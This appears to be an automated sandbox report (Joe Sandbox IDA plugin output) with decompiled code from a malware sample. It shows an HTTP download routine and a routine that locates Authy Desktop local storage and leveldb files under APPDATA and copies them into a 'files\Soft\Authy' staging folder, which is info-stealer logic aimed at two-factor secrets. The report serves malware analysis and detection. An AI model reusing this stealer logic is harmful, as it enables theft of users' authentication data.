                                                                                				E00430D40(0x6a90);
                                                                                				_t32 =  *0x447674; // 0x4124c941
                                                                                				 *(_t77 + 0x6a0c) = _t32 ^ _t77;
                                                                                				 *(_t77 - 0x70) =  *(_t77 + 0x6a18);
                                                                                				_t73 = __ecx;
                                                                                				E00427E30(_t77 - 0x6c, 0, 0x61a8);
                                                                                				_t37 = InternetOpenA(0x43e028, 0, 0, 0, 0);
                                                                                				_push("https://");
                                                                                				_push("http://");
                                                                                				 *(_t77 - 0x74) = _t37;
                                                                                				 *(_t77 - 0x80) = 0x100;
                                                                                				_t69 = 0;
                                                                                				if( *0x44a1d8() == 0) {
                                                                                					_t69 = 1;
                                                                                				}
                                                                                				if( *(_t77 - 0x74) != 0) {
                                                                                					 *(_t77 - 0x7c) = 0x927c0;
                                                                                					InternetSetOptionA( *(_t77 - 0x74), 6, _t77 - 0x7c, 4);
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_push(3);
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					if(_t69 == 0) {
                                                                                						_push(0x50);
                                                                                					} else {
                                                                                						_push(0x1bb);
                                                                                					}
                                                                                					_t44 = InternetConnectA( *(_t77 - 0x74), _t73, ??, ??, ??, ??, ??, ??);
                                                                                					 *(_t77 - 0x78) = _t44;
                                                                                					if(_t44 != 0) {
                                                                                						_push(0);
                                                                                						if(_t69 == 0) {
                                                                                							_push(0x4400100);
                                                                                						} else {
                                                                                							_push(0x4c00100);
                                                                                						}
                                                                                						_t71 = HttpOpenRequestA( *(_t77 - 0x78), "GET",  *(_t77 - 0x70), 0, 0, 0, ??, ??);
                                                                                						if(_t71 != 0) {
                                                                                							_t75 = 0;
                                                                                							do {
                                                                                								HttpSendRequestA(_t71, 0, 0, 0, 0);
                                                                                								if(HttpQueryInfoA(_t71, 0x13, _t77 + 0x690c, _t77 - 0x80, 0) == 0) {
                                                                                									goto L14;
                                                                                								} else {
                                                                                									_push("200");
                                                                                									_push(_t77 + 0x690c);
                                                                                									if( *0x44a1d8() == 0) {
                                                                                										while(InternetReadFile(_t71, _t77 + 0x613c, 0x7cf, _t77 - 0x70) != 0) {
                                                                                											_t57 =  *(_t77 - 0x70);
                                                                                											if(_t57 != 0) {
                                                                                												( &(_t57[0x613c]))[_t77] = 0;
                                                                                												 *0x44a1b8(_t77 - 0x6c, _t77 + 0x613c);
                                                                                												continue;
                                                                                											}
                                                                                											goto L20;
                                                                                										}
                                                                                									} else {
                                                                                										goto L14;
                                                                                									}
                                                                                								}
                                                                                								goto L20;
                                                                                								L14:
                                                                                								Sleep(0x7530);
                                                                                								_t75 = _t75 + 1;
                                                                                							} while (_t75 < 6);
                                                                                						}
                                                                                						L20:
                                                                                						InternetCloseHandle(_t71);
                                                                                					}
                                                                                					InternetCloseHandle( *(_t77 - 0x78));
                                                                                				}
                                                                                				InternetCloseHandle( *(_t77 - 0x74));
                                                                                				_pop(_t70);
                                                                                				_pop(_t74);
                                                                                				_pop(_t63);
                                                                                				return E0041DEB4(_t77 - 0x6c, _t63,  *(_t77 + 0x6a0c) ^ _t77, _t67, _t70, _t74);
                                                                                			}




















                                                                                0x0040ed7d
                                                                                0x0040ed7e
                                                                                0x0040ed8a
                                                                                0x0040ed8f
                                                                                0x0040ed96
                                                                                0x0040edaa
                                                                                0x0040edb4
                                                                                0x0040edb6
                                                                                0x0040edc7
                                                                                0x0040edcd
                                                                                0x0040edd2
                                                                                0x0040edd7
                                                                                0x0040edda
                                                                                0x0040ede1
                                                                                0x0040edeb
                                                                                0x0040eded
                                                                                0x0040eded
                                                                                0x0040edf1
                                                                                0x0040ee02
                                                                                0x0040ee09
                                                                                0x0040ee0f
                                                                                0x0040ee10
                                                                                0x0040ee11
                                                                                0x0040ee13
                                                                                0x0040ee14
                                                                                0x0040ee17
                                                                                0x0040ee20
                                                                                0x0040ee19
                                                                                0x0040ee19
                                                                                0x0040ee19
                                                                                0x0040ee26
                                                                                0x0040ee2c
                                                                                0x0040ee31
                                                                                0x0040ee37
                                                                                0x0040ee3a
                                                                                0x0040ee43
                                                                                0x0040ee3c
                                                                                0x0040ee3c
                                                                                0x0040ee3c
                                                                                0x0040ee5c
                                                                                0x0040ee60
                                                                                0x0040ee66
                                                                                0x0040ee68
                                                                                0x0040ee6d
                                                                                0x0040ee8a
                                                                                0x00000000
                                                                                0x0040ee8c
                                                                                0x0040ee8c
                                                                                0x0040ee97
                                                                                0x0040eea0
                                                                                0x0040eedb
                                                                                0x0040eebc
                                                                                0x0040eec1
                                                                                0x0040eec3
                                                                                0x0040eed5
                                                                                0x00000000
                                                                                0x0040eed5
                                                                                0x00000000
                                                                                0x0040eec1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040eea0
                                                                                0x00000000
                                                                                0x0040eea2
                                                                                0x0040eea7
                                                                                0x0040eead
                                                                                0x0040eeae
                                                                                0x0040eeb3
                                                                                0x0040eef2
                                                                                0x0040eef3
                                                                                0x0040eef3
                                                                                0x0040eefc
                                                                                0x0040eefc
                                                                                0x0040ef05
                                                                                0x0040ef11
                                                                                0x0040ef12
                                                                                0x0040ef18
                                                                                0x0040ef25

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0040EDB6
                                                                                • InternetOpenA.WININET(0043E028,00000000,00000000,00000000,00000000), ref: 0040EDC7
                                                                                • StrCmpCA.SHLWAPI(http://,https://,?,?,?,?,?,00000013), ref: 0040EDE3
                                                                                • InternetSetOptionA.WININET(?,00000006,?,00000004), ref: 0040EE09
                                                                                • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0040EE26
                                                                                • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,00000000,04400100,00000000), ref: 0040EE56
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040EE6D
                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040EE82
                                                                                • StrCmpCA.SHLWAPI(?,200,?,00000050,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00000013), ref: 0040EE98
                                                                                • Sleep.KERNEL32(00007530,?,00000050,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00000013), ref: 0040EEA7
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EED5
                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040EEE8
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EEF3
                                                                                • InternetCloseHandle.WININET(?), ref: 0040EEFC
                                                                                • InternetCloseHandle.WININET(?), ref: 0040EF05
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttp$OpenRequest$ConnectFileInfoOptionQueryReadSendSleep_memsetlstrcat
                                                                                • String ID: 200$GET$http://$https://
                                                                                • API String ID: 692990806-2803709044
                                                                                • Opcode ID: aabdaf97c9838ac05667adc0d8fb00d79d65b6a4f4fdabcdc8c3886a3daa7684
                                                                                • Instruction ID: 94b9f3f1bd54328b4ef323db83b1745eed844341cd3dac8c496b72eae20b6dd8
                                                                                • Opcode Fuzzy Hash: aabdaf97c9838ac05667adc0d8fb00d79d65b6a4f4fdabcdc8c3886a3daa7684
                                                                                • Instruction Fuzzy Hash: 1341BE72A4021CAFEB209FA1DC88EAF7B6DEB09744F14043AF602F6191D6755D209F69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E004118A4(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t166;
                                                                                				struct _SECURITY_ATTRIBUTES* _t171;
                                                                                				intOrPtr _t175;
                                                                                				struct _SECURITY_ATTRIBUTES* _t177;
                                                                                				intOrPtr _t184;
                                                                                				CHAR* _t188;
                                                                                				CHAR* _t192;
                                                                                				void* _t198;
                                                                                				void* _t205;
                                                                                				void* _t214;
                                                                                				WCHAR* _t215;
                                                                                				CHAR* _t239;
                                                                                				CHAR* _t243;
                                                                                				void* _t249;
                                                                                				void* _t256;
                                                                                				void* _t265;
                                                                                				WCHAR* _t266;
                                                                                				struct _SECURITY_ATTRIBUTES* _t285;
                                                                                				struct _SECURITY_ATTRIBUTES _t291;
                                                                                				struct _SECURITY_ATTRIBUTES _t294;
                                                                                				WCHAR* _t356;
                                                                                				WCHAR* _t369;
                                                                                				void* _t379;
                                                                                				void* _t380;
                                                                                				struct _SECURITY_ATTRIBUTES* _t381;
                                                                                				struct _SECURITY_ATTRIBUTES* _t382;
                                                                                				void* _t383;
                                                                                				intOrPtr _t385;
                                                                                				intOrPtr _t394;
                                                                                
                                                                                				_t383 = __eflags;
                                                                                				_t338 = __edx;
                                                                                				_push(0x194);
                                                                                				E004219DE(E00436F2F, __ebx, __edi, __esi);
                                                                                				_t353 = __ecx;
                                                                                				_push("APPDATA");
                                                                                				 *((intOrPtr*)(_t379 - 0x19c)) = __ecx;
                                                                                				_t166 = E0041F644(__ebx, __edi, __ecx, _t383);
                                                                                				 *((intOrPtr*)(_t379 - 0x34)) = 0xf;
                                                                                				 *((intOrPtr*)(_t379 - 0x38)) = 0;
                                                                                				 *((char*)(_t379 - 0x48)) = 0;
                                                                                				E0040381A(_t379 - 0x48, _t166);
                                                                                				_t381 = _t380 - 0x1c;
                                                                                				 *((intOrPtr*)(_t379 - 4)) = 0;
                                                                                				 *(_t379 - 0x188) = _t381;
                                                                                				_push("\\Authy Desktop\\Local Storage\\*.localstorage");
                                                                                				_push(_t381);
                                                                                				E0040D337(0, _t379 - 0x48, _t353, _t383);
                                                                                				_t283 = _t379 - 0x198;
                                                                                				E0041778D(_t379 - 0x198, _t379 - 0x48, _t353, _t383);
                                                                                				 *((char*)(_t379 - 4)) = 1;
                                                                                				_t171 =  *(_t379 - 0x194);
                                                                                				_t291 =  *(_t379 - 0x198);
                                                                                				 *(_t379 - 0x188) = _t171;
                                                                                				 *(_t379 - 0x180) = _t291;
                                                                                				if(_t291 != _t171) {
                                                                                					_t366 = _t353 + 8;
                                                                                					_t385 = _t366;
                                                                                					 *((intOrPtr*)(_t379 - 0x184)) = _t366;
                                                                                					do {
                                                                                						E0040E243(_t379 - 0x80,  *(_t379 - 0x180));
                                                                                						_t347 =  *((intOrPtr*)(_t379 - 0x184));
                                                                                						_push("\\files\\Soft");
                                                                                						_push(_t379 - 0x2c);
                                                                                						 *((char*)(_t379 - 4)) = 2;
                                                                                						_t239 = E0040D337(_t283,  *((intOrPtr*)(_t379 - 0x184)), _t366, _t385);
                                                                                						_t386 = _t239[0x14] - 0x10;
                                                                                						if(_t239[0x14] >= 0x10) {
                                                                                							_t239 =  *_t239;
                                                                                						}
                                                                                						_t283 = 0;
                                                                                						CreateDirectoryA(_t239, 0);
                                                                                						E00402C34(_t379 - 0x2c, 1, 0);
                                                                                						_push("\\files\\Soft\\Authy");
                                                                                						_push(_t379 - 0x2c);
                                                                                						_t243 = E0040D337(0, _t347, CreateDirectoryA, _t386);
                                                                                						_t387 = _t243[0x14] - 0x10;
                                                                                						if(_t243[0x14] >= 0x10) {
                                                                                							_t243 =  *_t243;
                                                                                						}
                                                                                						CreateDirectoryA(_t243, _t283);
                                                                                						E00402C34(_t379 - 0x2c, 1, _t283);
                                                                                						 *((intOrPtr*)(_t379 - 0x18)) = 0xf;
                                                                                						 *(_t379 - 0x1c) = _t283;
                                                                                						 *(_t379 - 0x2c) = _t283;
                                                                                						E00403A16(_t379 - 0x2c, _t387, "files\\Soft\\Authy", 0x10);
                                                                                						 *((char*)(_t379 - 4)) = 3;
                                                                                						_t249 = E004175C4(_t379 - 0x2c, _t379 - 0x64);
                                                                                						 *((char*)(_t379 - 4)) = 4;
                                                                                						E004175C4( *((intOrPtr*)(_t379 - 0x184)), _t379 - 0x160);
                                                                                						 *((char*)(_t379 - 4)) = 5;
                                                                                						E0040E32E(_t338);
                                                                                						_t338 = _t379 - 0x144;
                                                                                						 *((char*)(_t379 - 4)) = 6;
                                                                                						E0040E34B(_t249, _t379 - 0x144);
                                                                                						 *((char*)(_t379 - 4)) = 7;
                                                                                						_t256 = E0040E32E(_t379 - 0x144);
                                                                                						 *((char*)(_t379 - 4)) = 8;
                                                                                						_t369 = E0040E2B0(_t379 - 0xf0, _t379 - 0x80, _t256, _t379 - 0x80);
                                                                                						 *((char*)(_t379 - 4)) = 9;
                                                                                						 *((intOrPtr*)(_t379 - 0x1a0)) = E00417554(_t379 - 0x80, _t379 - 0x144, _t379 - 0xd4);
                                                                                						_push("\\Authy Desktop\\Local Storage\\");
                                                                                						_push(_t379 - 0xb8);
                                                                                						 *((char*)(_t379 - 4)) = 0xa;
                                                                                						E0040D337(_t283, _t379 - 0x48, _t369, _t387);
                                                                                						 *((char*)(_t379 - 4)) = 0xb;
                                                                                						_t265 = E0040D431( *((intOrPtr*)(_t379 - 0x1a0)), _t379 - 0x128);
                                                                                						 *((char*)(_t379 - 4)) = 0xc;
                                                                                						_t266 = E004175C4(_t265, _t379 - 0x9c);
                                                                                						if(_t369[0xa] >= 8) {
                                                                                							_t369 =  *_t369;
                                                                                						}
                                                                                						if(_t266[0xa] >= 8) {
                                                                                							_t266 =  *_t266;
                                                                                						}
                                                                                						CopyFileW(_t266, _t369, 1);
                                                                                						E00403960(0, _t379 - 0x9c, 1);
                                                                                						E00402C34(_t379 - 0x128, 1, _t283);
                                                                                						E00402C34(_t379 - 0xb8, 1, _t283);
                                                                                						E00402C34(_t379 - 0xd4, 1, _t283);
                                                                                						E00403960(0, _t379 - 0xf0, 1);
                                                                                						E00403960(0, _t379 - 0x10c, 1);
                                                                                						E00403960(0, _t379 - 0x144, 1);
                                                                                						E00403960(0, _t379 - 0x17c, 1);
                                                                                						E00403960(0, _t379 - 0x160, 1);
                                                                                						E00403960(0, _t379 - 0x64, 1);
                                                                                						E00402C34(_t379 - 0x2c, 1, _t283);
                                                                                						_t366 = _t379 - 0x80;
                                                                                						 *((char*)(_t379 - 4)) = 1;
                                                                                						E00403960(0, _t379 - 0x80, 1);
                                                                                						 *(_t379 - 0x180) =  *(_t379 - 0x180) + 0x1c;
                                                                                						_t390 =  *(_t379 - 0x180) -  *(_t379 - 0x188);
                                                                                					} while ( *(_t379 - 0x180) !=  *(_t379 - 0x188));
                                                                                				}
                                                                                				_t382 = _t381 - 0x1c;
                                                                                				 *(_t379 - 0x188) = _t382;
                                                                                				_push("\\Authy Desktop\\Local Storage\\leveldb\\*");
                                                                                				_push(_t382);
                                                                                				E0040D337(_t283, _t379 - 0x48, _t353, _t390);
                                                                                				_t342 = E0041778D(_t379 - 0x20, _t379 - 0x48, _t353, _t390);
                                                                                				_t175 = _t379 - 0x198;
                                                                                				if(_t175 == _t342) {
                                                                                					_t285 = 0;
                                                                                					__eflags = 0;
                                                                                				} else {
                                                                                					_t353 = _t175;
                                                                                					E0040E26D(_t175);
                                                                                					 *(_t379 - 0x198) = _t342->nLength;
                                                                                					 *(_t379 - 0x194) = _t342->lpSecurityDescriptor;
                                                                                					_t285 = 0;
                                                                                					 *(_t379 - 0x190) = _t342->bInheritHandle;
                                                                                					 *_t342 = 0;
                                                                                					_t342->lpSecurityDescriptor = 0;
                                                                                					_t342->bInheritHandle = 0;
                                                                                				}
                                                                                				 *((char*)(_t379 - 4)) = 1;
                                                                                				_t176 =  *((intOrPtr*)(_t379 - 0x20));
                                                                                				if( *((intOrPtr*)(_t379 - 0x20)) != _t285) {
                                                                                					E0040E28F(_t176,  *(_t379 - 0x1c));
                                                                                					_push( *((intOrPtr*)(_t379 - 0x20)));
                                                                                					E0041DFFD();
                                                                                				}
                                                                                				_t177 =  *(_t379 - 0x194);
                                                                                				_t294 =  *(_t379 - 0x198);
                                                                                				 *(_t379 - 0x188) = _t177;
                                                                                				 *(_t379 - 0x180) = _t294;
                                                                                				if(_t294 != _t177) {
                                                                                					_t184 =  *((intOrPtr*)(_t379 - 0x19c)) + 8;
                                                                                					_t394 = _t184;
                                                                                					 *((intOrPtr*)(_t379 - 0x184)) = _t184;
                                                                                					do {
                                                                                						E0040E243(_t379 - 0x80,  *(_t379 - 0x180));
                                                                                						_t343 =  *((intOrPtr*)(_t379 - 0x184));
                                                                                						_push("\\files\\Soft");
                                                                                						_push(_t379 - 0x64);
                                                                                						 *((char*)(_t379 - 4)) = 0x10;
                                                                                						_t188 = E0040D337(_t285,  *((intOrPtr*)(_t379 - 0x184)), _t353, _t394);
                                                                                						_t395 = _t188[0x14] - 0x10;
                                                                                						if(_t188[0x14] >= 0x10) {
                                                                                							_t188 =  *_t188;
                                                                                						}
                                                                                						CreateDirectoryA(_t188, _t285);
                                                                                						E00402C34(_t379 - 0x64, 1, _t285);
                                                                                						_push("\\files\\Soft\\AuthyNew");
                                                                                						_push(_t379 - 0x64);
                                                                                						_t192 = E0040D337(_t285, _t343, CreateDirectoryA, _t395);
                                                                                						_t396 = _t192[0x14] - 0x10;
                                                                                						if(_t192[0x14] >= 0x10) {
                                                                                							_t192 =  *_t192;
                                                                                						}
                                                                                						CreateDirectoryA(_t192, _t285);
                                                                                						E00402C34(_t379 - 0x64, 1, _t285);
                                                                                						 *((intOrPtr*)(_t379 - 0x18)) = 0xf;
                                                                                						 *(_t379 - 0x1c) = _t285;
                                                                                						 *(_t379 - 0x2c) = _t285;
                                                                                						E00403A16(_t379 - 0x2c, _t396, "files\\Soft\\AuthyNew", 0x13);
                                                                                						 *((char*)(_t379 - 4)) = 0x11;
                                                                                						_t198 = E004175C4(_t379 - 0x2c, _t379 - 0x9c);
                                                                                						 *((char*)(_t379 - 4)) = 0x12;
                                                                                						E004175C4( *((intOrPtr*)(_t379 - 0x184)), _t379 - 0x128);
                                                                                						 *((char*)(_t379 - 4)) = 0x13;
                                                                                						E0040E32E(_t338);
                                                                                						_t338 = _t379 - 0xd4;
                                                                                						 *((char*)(_t379 - 4)) = 0x14;
                                                                                						E0040E34B(_t198, _t379 - 0xd4);
                                                                                						 *((char*)(_t379 - 4)) = 0x15;
                                                                                						_t205 = E0040E32E(_t379 - 0xd4);
                                                                                						 *((char*)(_t379 - 4)) = 0x16;
                                                                                						_t356 = E0040E2B0(_t379 - 0x10c, _t379 - 0x80, _t205, _t379 - 0x80);
                                                                                						 *((char*)(_t379 - 4)) = 0x17;
                                                                                						 *((intOrPtr*)(_t379 - 0x19c)) = E00417554(_t379 - 0x80, _t379 - 0xd4, _t379 - 0x144);
                                                                                						_push("\\Authy Desktop\\Local Storage\\leveldb\\");
                                                                                						_push(_t379 - 0x17c);
                                                                                						 *((char*)(_t379 - 4)) = 0x18;
                                                                                						E0040D337(_t285, _t379 - 0x48, _t356, _t396);
                                                                                						 *((char*)(_t379 - 4)) = 0x19;
                                                                                						_t214 = E0040D431( *((intOrPtr*)(_t379 - 0x19c)), _t379 - 0x160);
                                                                                						 *((char*)(_t379 - 4)) = 0x1a;
                                                                                						_t215 = E004175C4(_t214, _t379 - 0x64);
                                                                                						if(_t356[0xa] >= 8) {
                                                                                							_t356 =  *_t356;
                                                                                						}
                                                                                						if(_t215[0xa] >= 8) {
                                                                                							_t215 =  *_t215;
                                                                                						}
                                                                                						CopyFileW(_t215, _t356, 1);
                                                                                						_t342 = 0;
                                                                                						E00403960(0, _t379 - 0x64, 1);
                                                                                						E00402C34(_t379 - 0x160, 1, _t285);
                                                                                						E00402C34(_t379 - 0x17c, 1, _t285);
                                                                                						E00402C34(_t379 - 0x144, 1, _t285);
                                                                                						E00403960(0, _t379 - 0x10c, 1);
                                                                                						E00403960(0, _t379 - 0xf0, 1);
                                                                                						E00403960(0, _t379 - 0xd4, 1);
                                                                                						E00403960(0, _t379 - 0xb8, 1);
                                                                                						E00403960(0, _t379 - 0x128, 1);
                                                                                						E00403960(0, _t379 - 0x9c, 1);
                                                                                						E00402C34(_t379 - 0x2c, 1, _t285);
                                                                                						_t353 = _t379 - 0x80;
                                                                                						 *((char*)(_t379 - 4)) = 1;
                                                                                						E00403960(0, _t379 - 0x80, 1);
                                                                                						 *(_t379 - 0x180) =  *(_t379 - 0x180) + 0x1c;
                                                                                					} while ( *(_t379 - 0x180) !=  *(_t379 - 0x188));
                                                                                				}
                                                                                				_t178 =  *(_t379 - 0x198);
                                                                                				if( *(_t379 - 0x198) != _t285) {
                                                                                					E0040E28F(_t178,  *(_t379 - 0x194));
                                                                                					_push( *(_t379 - 0x198));
                                                                                					E0041DFFD();
                                                                                				}
                                                                                				 *(_t379 - 0x198) = _t285;
                                                                                				 *(_t379 - 0x194) = _t285;
                                                                                				 *(_t379 - 0x190) = _t285;
                                                                                				E00402C34(_t379 - 0x48, 1, _t285);
                                                                                				return E00421A61(_t285, _t342, _t353);
                                                                                			}
































                                                                                0x004118a4
                                                                                0x004118a4
                                                                                0x004118a4
                                                                                0x004118ae
                                                                                0x004118b3
                                                                                0x004118b5
                                                                                0x004118ba
                                                                                0x004118c0
                                                                                0x004118cc
                                                                                0x004118d3
                                                                                0x004118d6
                                                                                0x004118d9
                                                                                0x004118de
                                                                                0x004118e1
                                                                                0x004118e6
                                                                                0x004118ec
                                                                                0x004118f1
                                                                                0x004118f5
                                                                                0x004118fc
                                                                                0x00411902
                                                                                0x00411907
                                                                                0x0041190b
                                                                                0x00411911
                                                                                0x00411917
                                                                                0x0041191d
                                                                                0x00411925
                                                                                0x0041192b
                                                                                0x0041192b
                                                                                0x0041192e
                                                                                0x00411934
                                                                                0x0041193d
                                                                                0x00411942
                                                                                0x0041194b
                                                                                0x00411950
                                                                                0x00411951
                                                                                0x00411955
                                                                                0x0041195a
                                                                                0x00411960
                                                                                0x00411962
                                                                                0x00411962
                                                                                0x0041196a
                                                                                0x0041196e
                                                                                0x00411976
                                                                                0x0041197e
                                                                                0x00411983
                                                                                0x00411984
                                                                                0x00411989
                                                                                0x0041198f
                                                                                0x00411991
                                                                                0x00411991
                                                                                0x00411995
                                                                                0x0041199d
                                                                                0x004119ac
                                                                                0x004119b3
                                                                                0x004119b6
                                                                                0x004119b9
                                                                                0x004119c5
                                                                                0x004119c9
                                                                                0x004119dd
                                                                                0x004119e1
                                                                                0x004119ec
                                                                                0x004119f0
                                                                                0x004119f9
                                                                                0x004119ff
                                                                                0x00411a03
                                                                                0x00411a0e
                                                                                0x00411a12
                                                                                0x00411a23
                                                                                0x00411a2d
                                                                                0x00411a39
                                                                                0x00411a42
                                                                                0x00411a4e
                                                                                0x00411a53
                                                                                0x00411a57
                                                                                0x00411a5b
                                                                                0x00411a70
                                                                                0x00411a74
                                                                                0x00411a80
                                                                                0x00411a84
                                                                                0x00411a8d
                                                                                0x00411a8f
                                                                                0x00411a8f
                                                                                0x00411a95
                                                                                0x00411a97
                                                                                0x00411a97
                                                                                0x00411a9d
                                                                                0x00411aad
                                                                                0x00411abd
                                                                                0x00411aca
                                                                                0x00411ad7
                                                                                0x00411ae3
                                                                                0x00411af0
                                                                                0x00411afd
                                                                                0x00411b0a
                                                                                0x00411b17
                                                                                0x00411b21
                                                                                0x00411b2c
                                                                                0x00411b33
                                                                                0x00411b36
                                                                                0x00411b3a
                                                                                0x00411b3f
                                                                                0x00411b4c
                                                                                0x00411b4c
                                                                                0x00411934
                                                                                0x00411b58
                                                                                0x00411b5d
                                                                                0x00411b63
                                                                                0x00411b68
                                                                                0x00411b6c
                                                                                0x00411b7b
                                                                                0x00411b7d
                                                                                0x00411b85
                                                                                0x00411bb4
                                                                                0x00411bb4
                                                                                0x00411b87
                                                                                0x00411b87
                                                                                0x00411b89
                                                                                0x00411b90
                                                                                0x00411b99
                                                                                0x00411ba2
                                                                                0x00411ba4
                                                                                0x00411baa
                                                                                0x00411bac
                                                                                0x00411baf
                                                                                0x00411baf
                                                                                0x00411bb6
                                                                                0x00411bba
                                                                                0x00411bbf
                                                                                0x00411bc4
                                                                                0x00411bc9
                                                                                0x00411bcc
                                                                                0x00411bd1
                                                                                0x00411bd2
                                                                                0x00411bd8
                                                                                0x00411bde
                                                                                0x00411be4
                                                                                0x00411bec
                                                                                0x00411bf8
                                                                                0x00411bf8
                                                                                0x00411bfb
                                                                                0x00411c01
                                                                                0x00411c0a
                                                                                0x00411c0f
                                                                                0x00411c18
                                                                                0x00411c1d
                                                                                0x00411c1e
                                                                                0x00411c22
                                                                                0x00411c27
                                                                                0x00411c2d
                                                                                0x00411c2f
                                                                                0x00411c2f
                                                                                0x00411c39
                                                                                0x00411c41
                                                                                0x00411c49
                                                                                0x00411c4e
                                                                                0x00411c4f
                                                                                0x00411c54
                                                                                0x00411c5a
                                                                                0x00411c5c
                                                                                0x00411c5c
                                                                                0x00411c60
                                                                                0x00411c68
                                                                                0x00411c77
                                                                                0x00411c7e
                                                                                0x00411c81
                                                                                0x00411c84
                                                                                0x00411c93
                                                                                0x00411c97
                                                                                0x00411cab
                                                                                0x00411caf
                                                                                0x00411cba
                                                                                0x00411cbe
                                                                                0x00411cc7
                                                                                0x00411ccd
                                                                                0x00411cd1
                                                                                0x00411cdc
                                                                                0x00411ce0
                                                                                0x00411cf1
                                                                                0x00411cfb
                                                                                0x00411d07
                                                                                0x00411d10
                                                                                0x00411d1c
                                                                                0x00411d21
                                                                                0x00411d25
                                                                                0x00411d29
                                                                                0x00411d3e
                                                                                0x00411d42
                                                                                0x00411d4b
                                                                                0x00411d4f
                                                                                0x00411d58
                                                                                0x00411d5a
                                                                                0x00411d5a
                                                                                0x00411d60
                                                                                0x00411d62
                                                                                0x00411d62
                                                                                0x00411d68
                                                                                0x00411d70
                                                                                0x00411d75
                                                                                0x00411d85
                                                                                0x00411d92
                                                                                0x00411d9f
                                                                                0x00411dab
                                                                                0x00411db8
                                                                                0x00411dc5
                                                                                0x00411dd2
                                                                                0x00411ddf
                                                                                0x00411dec
                                                                                0x00411df7
                                                                                0x00411dfe
                                                                                0x00411e01
                                                                                0x00411e05
                                                                                0x00411e0a
                                                                                0x00411e17
                                                                                0x00411c01
                                                                                0x00411e23
                                                                                0x00411e2b
                                                                                0x00411e33
                                                                                0x00411e38
                                                                                0x00411e3e
                                                                                0x00411e43
                                                                                0x00411e4a
                                                                                0x00411e50
                                                                                0x00411e56
                                                                                0x00411e5c
                                                                                0x00411e66

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 004118AE
                                                                                • __wgetenv.LIBCMT ref: 004118C0
                                                                                  • Part of subcall function 0040D337: __EH_prolog3.LIBCMT ref: 0040D33E
                                                                                  • Part of subcall function 0041778D: __EH_prolog3_GS.LIBCMT ref: 00417797
                                                                                  • Part of subcall function 0041778D: FindFirstFileW.KERNEL32(00000000,?,?), ref: 004177CB
                                                                                  • Part of subcall function 0041778D: FindNextFileW.KERNEL32(?,?,00000001,?,00000001), ref: 0041784B
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,\Opera GX Stable\,?,\Opera Stable\,?,?,?,?,00000000), ref: 0041196E
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,00000000), ref: 00411995
                                                                                • CopyFileW.KERNEL32(00000000,00000000,00000001,?,?,?,?,files\Soft\AuthyNew,00000013,00000001,00000000), ref: 00411D68
                                                                                • CopyFileW.KERNEL32(00000000,00000000,00000001,?,?,?,?,files\Soft\Authy,00000010,00000001,00000000,?,?,?,?,00000000), ref: 00411A9D
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                  • Part of subcall function 00403960: _memmove.LIBCMT ref: 0040397A
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,\Opera GX Stable\,?), ref: 00411C39
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,\Opera GX Stable\), ref: 00411C60
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateDirectoryFile$CopyFindH_prolog3__memmove$FirstH_prolog3Next__wgetenv
                                                                                • String ID: APPDATA$\Authy Desktop\Local Storage\$\Authy Desktop\Local Storage\*.localstorage$\Authy Desktop\Local Storage\leveldb\$\Authy Desktop\Local Storage\leveldb\*$\files\Soft$\files\Soft\Authy$\files\Soft\AuthyNew$files\Soft\Authy$files\Soft\AuthyNew
                                                                                • API String ID: 3262973198-1538576089
                                                                                • Opcode ID: 5e05d7e298b713f4d04a40a79522251ee664bf33a0ff97227a87ce56e219096f
                                                                                • Instruction ID: 36fab18b497e85dbfc4d7542b53a560fd78f9cf0078a9a0cee02ce675f6ee358
